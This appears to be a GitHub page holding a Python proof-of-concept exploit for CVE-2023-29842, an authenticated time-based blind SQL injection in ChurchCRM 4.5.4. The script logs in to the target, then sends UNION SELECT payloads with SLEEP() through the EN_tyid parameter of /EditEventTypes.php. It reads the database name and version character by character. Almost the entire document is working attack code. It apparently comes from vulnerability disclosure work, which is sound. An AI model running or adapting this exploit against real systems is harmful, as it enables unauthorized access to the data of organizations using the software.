Permalink
Cannot retrieve contributors at this time
Name already in use
A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
CVE/CVE-2023-29842/CVE-2023-29842.py /
Go to fileThis commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
88 lines (72 sloc)
3.58 KB
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Exploit Title: ChurchCRM 4.5.4 - Authenticated Blind SQL Injection via the EN_tyid POST parameter | |
| # Date: 03-05-2023 | |
| # Exploit Author: Arvandy | |
| # Blog Post: https://github.com/arvandy/CVE/blob/main/CVE-2023-29842/CVE-2023-29842.md | |
| # Software Link: https://github.com/ChurchCRM/CRM/releases | |
| # Vendor Homepage: http://churchcrm.io/ | |
| # Version: 4.5.4 | |
| # Tested on: Windows, Linux | |
| # CVE: CVE-2023-29842 | |
| """ | |
| The endpoint /EditEventTypes.php is vulnerable to Blind SQL Injection (Time-based) via the EN_tyid POST parameter. | |
| This endpoint can be triggered through the following menu: Events - List Event Types - Edit Event Types - Save Name. | |
| The EN_tyid Parameter is taken directly from the user input and passed into the SQL query without any sanitization or input escaping. | |
| This allows the attacker to inject malicious Event payloads to execute the malicious SQL query. | |
| This script is created as Proof of Concept to retrieve the database name and version. | |
| """ | |
| import sys, requests | |
| def injection(target, inj_str, session_cookies): | |
| for j in range(32, 126): | |
| url = "%s/EditEventTypes.php" % (target) | |
| headers = {'Content-Type':'application/x-www-form-urlencoded','Cookie':'CRM-2c90cf299230a50dab55aee824ed9b08='+str(session_cookies)} | |
| data = "EN_tyid=%s&EN_ctid=&newEvtName=NewEvent&Action=NAME&newEvtStartTime=09:30:00&newCountName=" % (inj_str.replace("[CHAR]", str(j))) | |
| r = requests.post(url, headers=headers, data=data) | |
| res = r.text | |
| if (r.elapsed.total_seconds () > 2 ): | |
| return j | |
| return None | |
| def retrieveDBName(session_cookies): | |
| db_name = "" | |
| print("(+) Retrieving database name, please wait") | |
| for i in range (1,100): | |
| injection_str = "1'+UNION+SELECT+NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,IF(ASCII(SUBSTRING((SELECT+DATABASE()),%d,1))=[CHAR],SLEEP(2),null)-- -" % i | |
| retrieved_value = injection(target, injection_str, session_cookies) | |
| if (retrieved_value): | |
| db_name += chr(retrieved_value) | |
| else: | |
| break | |
| print("Database Name: "+db_name) | |
| def retrieveDBVersion(session_cookies): | |
| db_version = "" | |
| print("(+) Retrieving database version, please wait") | |
| for i in range (1,100): | |
| injection_str = "1'+UNION+SELECT+NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,IF(ASCII(SUBSTRING((SELECT+@@version),%d,1))=[CHAR],SLEEP(2),null)-- -" % i | |
| retrieved_value = injection(target, injection_str, session_cookies) | |
| if (retrieved_value): | |
| db_version += chr(retrieved_value) | |
| else: | |
| break | |
| print("Database Version: "+db_version) | |
| def login(target, username, password): | |
| target = "%s/session/begin" % (target) | |
| headers = {'Content-Type': 'application/x-www-form-urlencoded'} | |
| data = "User=%s&Password=%s" % (username, password) | |
| s = requests.session() | |
| r = s.post(target, data = data, headers = headers) | |
| return s.cookies.get('CRM-2c90cf299230a50dab55aee824ed9b08') | |
| def main(): | |
| print("(!) Login to the target application") | |
| session_cookies = login(target, username, password) | |
| print("(!) Exploiting the Blind Auth SQL Injection to retrieve database name and versions") | |
| retrieveDBName(session_cookies) | |
| print("") | |
| retrieveDBVersion(session_cookies) | |
| if __name__ == "__main__": | |
| if len(sys.argv) != 4: | |
| print("(!) Usage: python3 exploit.py <URL> <username> <password>") | |
| print("(!) E.g.,: python3 exploit.py http://192.168.1.100/ChurchCRM user pass") | |
| sys.exit(-1) | |
| target = sys.argv[1] | |
| username = sys.argv[2] | |
| password = sys.argv[3] | |
| main() |